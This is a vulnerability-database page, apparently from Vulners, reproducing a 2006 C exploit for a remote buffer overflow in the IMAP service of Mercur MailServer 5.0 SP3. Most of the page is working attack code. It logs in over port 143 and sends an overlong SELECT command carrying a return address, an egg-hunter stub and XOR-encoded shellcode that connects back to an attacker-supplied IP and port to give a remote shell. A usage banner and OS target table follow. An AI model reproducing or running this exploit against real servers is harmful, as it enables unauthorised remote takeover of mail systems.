Vulners
Lucene search
Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (1)
/*
* mercur.cpp
*
* Atrium Mercur IMAP 5.0 SP3 Messaging Multiple IMAP Commands Remote Exploit
* Copyright (C) 2006 Javaphile Group
* http://www.javaphile.org
*
* Exploits code by : pll Ellison.Tang[at]gmail[dot]com
*
* Bug Reference:
* http://www.frsirt.com/bulletins/4332
*
*/
#include <stdio.h>
#include <time.h>
#include <stdlib.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
SOCKET ConnectTo(char *ip, int port)
{
WSADATA wsaData;
SOCKET s;
struct hostent *he;
struct sockaddr_in host;
int nTimeout=150000;
if(WSAStartup(MAKEWORD(1,1),&wsaData)!=0)
{
printf("[-]WSAStartup failed.\n");
exit(-1);
}
if((he=gethostbyname(ip))==0)
{
printf("[-]Failed to resolve '%s'.", ip);
exit(-1);
}
host.sin_port=htons(port);
host.sin_family=AF_INET;
host.sin_addr=*((struct in_addr *)he->h_addr);
if ((s=socket(AF_INET,SOCK_STREAM,0))<0)
{
printf("[-]Failed creating socket.");
exit(-1);
}
if ((connect(s,(struct sockaddr *)&host,sizeof(host)))==-1)
{
closesocket(s);
printf("[-]Failed connecting to host.\n");
exit(-1);
}
setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char*)&nTimeout,sizeof(nTimeout));
return s;
}
void Disconnect(SOCKET s)
{
closesocket(s);
WSACleanup();
}
void PrintSc(unsigned char *sc, int len)
{
int i,j;
char *p;
char msg[6];
//printf("/* %d bytes */\n", buffsize);
// Print general shellcode
for(i = 0; i < len; i++)
{
if((i%16)==0)
{
if(i!=0)
printf("\"\n\"");
else
printf("\"");
}
//printf("\\x%.2X", sc[i]);
sprintf(msg, "\\x%.2X", sc[i] & 0xff);
for( p = msg, j=0; j < 4; p++, j++ )
{
if(isupper(*p))
printf("%c", _tolower(*p));
else
printf("%c", p[0]);
}
}
printf("\";\n");
}
void main(int argc,char* argv[])
{
struct OSTYPE
{
unsigned int ret;
char des[255];
};
OSTYPE os[] = {
{0x7FFA4512, "CN Windows ALL 0x7FFA4512"},
{0x7801f4fb, "Windows 2k SP4 0x7801f4fb"},
{0xDDDDDDDD, "Debug"},
{0, NULL}
};
unsigned char shellcode[]=
/* ip offset: 71 + 21 = 92 */
/* port offset: 78 + 21 = 99 */
/* 21 bytes decode */
"\xeb\x0e\x5b\x4b\x33\xc9\xb1\xfe\x80\x34\x0b\xee\xe2\xfa\xeb\x05"
"\xe8\xed\xff\xff\xff"
/* 254 bytes shellcode, xor with 0xee */
"\x07\x36\xee\xee\xee\xb1\x8a\x4f\xde\xee\xee\xee\x65\xae\xe2\x65"
"\x9e\xf2\x43\x65\x86\xe6\x65\x19\x84\xea\xb7\x06\x96\xee\xee\xee"
"\x0c\x17\x86\xdd\xdc\xee\xee\x86\x99\x9d\xdc\xb1\xba\x11\xf8\x7b"
"\x84\xed\xb7\x06\x8e\xee\xee\xee\x0c\x17\xbf\xbf\xbf\xbf\x84\xef"
"\x84\xec\x11\xb8\xfe\x7d\x86"
"\x91\xee\xee\xef" //ip
"\x86"
"\xec\xee"
"\xee\xdb" //port
"\x65\x02\x84\xfe\xbb\xbd\x11\xb8\xfa\x6b\x2e\x9b\xd6\x65\x12\x84"
"\xfc\xb7\x45\x0c\x13\x88\x29\xaa\xca\xd2\xef\xef\x7d\x45\x45\x45"
"\x65\x12\x86\x8d\x83\x8a\xee\x65\x02\xbe\x63\xa9\xfe\xb9\xbe\xbf"
"\xbf\xbf\x84\xef\xbf\xbf\xbb\xbf\x11\xb8\xea\x84\x11\x11\xd9\x11"
"\xb8\xe2\x11\xb8\xf6\x11\xb8\xe6\xbf\xb8\x65\x9b\xd2\x65\x9a\xc0"
"\x96\xed\x1b\xb8\x65\x98\xce\xed\x1b\xdd\x27\xa7\xaf\x43\xed\x2b"
"\xdd\x35\xe1\x50\xfe\xd4\x38\x9a\xe6\x2f\x25\xe3\xed\x34\xae\x05"
"\x1f\xd5\xf1\x9b\x09\xb0\x65\xb0\xca\xed\x33\x88\x65\xe2\xa5\x65"
"\xb0\xf2\xed\x33\x65\xea\x65\xed\x2b\x45\xb0\xb7\x2d\x06\xcd\x11"
"\x11\x11\x60\xa0\xe0\x02\x9c\x10\x5d\xf8\x01\x20\x0e\x8e\x43\x37"
"\xeb\x20\x37\xe7\x1b\x43\x02\x17\x44\x8e\x09\x97\x28\x97";
unsigned char FindSc[]=
"\x8B\xCC\x80\xE9\x3E\x8B\xF1\x33\xC0\x40\xC1\xE0\x0A\x04\x80\x8B"
"\xF8\x57\x33\xC9\xB1\x3E\xF3\xA4\x5F\xFF\xE7\x8B\xC7\x04\x28\x50"
"\x33\xC0\x50\x64\x89\x20\xBA\x41\x47\x4F\x55\x33\xFF\x3B\x17\x74"
"\x03\x47\xEB\xF9\x83\xC7\x04\x3B\x17\x74\x03\x47\xEB\xEF\x83\xC7"
"\x04\x57\xC3\x8B\x54\x24\x0C\x33\xC0\xB4\x10\x33\xDB\xB3\x9C\x01"
"\x04\x13\x33\xC0\xC3"
"\x90\x90\x90\x90"
"\xEB\xA5";
if(argc < 5)
{
printf("Mercur IMAPD 5.0 SP3 Remote Exploit\n");
printf("-------------------------------------------\n");
printf("Usage:\n");
printf(" %s <Victim> <Connect back IP> <Connect back Port> <OsType>\n", argv[0]);
printf("\nType could be:\n");
int i=0;
while(os[i].ret)
{
printf(" [%d] %s\n", i, os[i].des);
i++;
}
return;
}
SOCKET s=ConnectTo(argv[1],143);
printf("[+]Connected to target...");
char szRecvBuff[600] = {0};
if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0)
{
printf("failed!\n");
return;
}
else
{
printf("done!\n");
}
// printf("%s\n",szRecvBuff);
if(strstr(szRecvBuff, "MERCUR") == NULL)
{
printf("[-]Seems not IMAP running.\n");
printf("Quiting...");
return;
}
else
{
printf("[*]Seems IMAP running.\n");
}
unsigned long dwCbIp=inet_addr(argv[2]);
unsigned short q=(unsigned short)atoi(argv[3]);
unsigned short dwCbPort=(unsigned short)q;
dwCbIp=dwCbIp^0xEEEEEEEE;
dwCbPort=dwCbPort^0xEEEE;
shellcode[92] =(char) (dwCbIp & 0x000000FF);
shellcode[93] =(char) ((dwCbIp & 0x0000FF00)>>8);
shellcode[94] =(char) ((dwCbIp & 0x00FF0000)>>16);
shellcode[95] =(char) ((dwCbIp & 0xFF000000)>>24);
shellcode[99] =(char) ((dwCbPort & 0x0000FF00)>>8);
shellcode[100] =(char) (dwCbPort & 0x000000FF);
char szUserName[20]={0};
printf("[?]Username:");
gets(szUserName);
char szPassWord[20]={0};
printf("[?]Passwd:");
gets(szPassWord);
char szLogin[]=" login ";
char szLoginInfo[50]={0};
unsigned char szSpace=0x20;
char szEnd[]="\r\n";
memcpy(szLoginInfo,szUserName,lstrlen(szUserName));
int dwLen=lstrlen(szUserName);
memcpy(szLoginInfo+dwLen,szLogin,lstrlen(szLogin));
dwLen+=lstrlen(szLogin);
memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord));
dwLen+=lstrlen(szPassWord);
memcpy(szLoginInfo+dwLen,&szSpace,1);
dwLen++;
memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord));
dwLen+=lstrlen(szPassWord);
memcpy(szLoginInfo+dwLen,szEnd,lstrlen(szEnd));
// printf("%s\n",szLoginInfo);
printf("[+]Sending Login Info...");
send(s,szLoginInfo,lstrlen(szLoginInfo),0);
if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0)
{
printf("failed!\n");
return;
}
else
{
printf("done!\n");
}
// printf("%s\n",szRecvBuff);
if(strstr(szRecvBuff, "OK") == NULL)
{
printf("[-]Seems not a valid user or not support IMAP.\n");
printf("Quiting...");
return;
}
else
{
printf("[*]Seems a valid user.\n");
}
char szSelect[]=" select ";
char szMagicData[1000]={0};
memset(szMagicData,'A',sizeof(szMagicData)-1);
memcpy(szMagicData,szUserName,lstrlen(szUserName));
memcpy(szMagicData+lstrlen(szUserName),szSelect,sizeof szSelect-1);
int p=atoi(argv[4]);
*(unsigned int *)&FindSc[85] = os[p].ret;
memcpy(szMagicData+251-sizeof FindSc+1,FindSc,sizeof FindSc-1);
memcpy(szMagicData+251,szEnd,sizeof szEnd-1);
char szAdog[]="AGOU";
memcpy(szMagicData+253,szAdog,sizeof szAdog-1);
memcpy(szMagicData+257,szAdog,sizeof szAdog-1);
memcpy(szMagicData+261,shellcode,sizeof shellcode-1);
memcpy(szMagicData+sizeof szMagicData-sizeof szEnd,szEnd,sizeof szEnd-1);
printf("[+]Sending Magic Data To server...Good Luck!\n");
send(s,szMagicData,sizeof szMagicData-1,0);
recv(s,szRecvBuff,sizeof(szRecvBuff),0);
printf("%s\n",szRecvBuff);
Disconnect(s);
printf("[?]Sending finished...Good luck!\n");
}
// milw0rm.com [2006-03-19]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Mar 2006 00:00Current
7High risk
Vulners AI Score7